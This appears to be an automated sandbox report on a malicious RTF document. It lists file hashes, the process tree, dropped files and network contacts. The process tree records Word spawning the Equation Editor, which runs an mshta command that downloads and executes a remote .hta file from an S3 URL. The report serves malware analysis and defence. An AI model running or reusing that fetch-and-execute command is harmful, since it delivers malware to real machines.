File name: | 91561bdef37569a413556734f4176de4.rtf |
Full analysis: | https://app.any.run/tasks/63e11c96-dc63-467c-aade-fad7970c385d |
Verdict: | Malicious activity |
Analysis date: | May 21, 2019, 01:56:56 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, ANSI |
MD5: | 91561BDEF37569A413556734F4176DE4 |
SHA1: | FDBE452F7530761AB0818E5F65D99CBC96508F48 |
SHA256: | 3F627582B50B61FBDEB1F3A8AFFB6AC332A11987C591C86FA02B3888B05CC235 |
SSDEEP: | 48:Mp54iWuutGfEjNMtvbDSj3xMa2763PMCphyD9LhQQQzQUAUxNhHb11gb90RCZNys:MwuUG5VoWxmEOyRFVS1E9fNDHy4h/1Nv |
.rtf | | | Rich Text Format (100) |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1212 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\91561bdef37569a413556734f4176de4.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
872 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
552 | mshta https://s3.amazonaws.com/rewqqq/jksd/jk.hta | C:\Windows\system32\mshta.exe | EQNEDT32.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1212 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR324E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1212 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FC7F81AF-9EF3-46EA-B1C4-C034180746C7}.tmp | — | |
MD5:— | SHA256:— | |||
1212 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{724A7071-CD0C-4CCC-9570-5104A8B83D59}.tmp | — | |
MD5:— | SHA256:— | |||
1212 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:4DF3E8AC277FFC6F4230911667B2677C | SHA256:F5D9DC6B782BBC249AA5472A338E83B553EC57C575B6FCEB55D01F868EB090C2 | |||
1212 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$561bdef37569a413556734f4176de4.rtf | pgc | |
MD5:19FEE419C884DF5E12C88CA001247B00 | SHA256:7CB827E687140D11A8EE1C12C3495943BC958863924EC42F08611C35C209BD5E | |||
1212 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{62D90A86-B78C-4F7A-BDE1-31C08E7B67B9}.tmp | binary | |
MD5:32CEFE02C1B50B15DCF5FB8486DA0746 | SHA256:2E04E1280CEA8CA625C0775A1180D0F5F63EB9535298E94A1F9698A2F8768BEE | |||
1212 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B4E8509C.wmf | wmf | |
MD5:975B76E8E77D57CC386AF977A08B1E31 | SHA256:8D80E9B9B39CD00F3BFADB3B2538DC46845FE8D0E7854D5DD9C9C381150DEDAD |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
552 | mshta.exe | 52.216.238.37:443 | s3.amazonaws.com | Amazon.com, Inc. | US | shared |
Domain | IP | Reputation |
---|---|---|
s3.amazonaws.com |
| shared |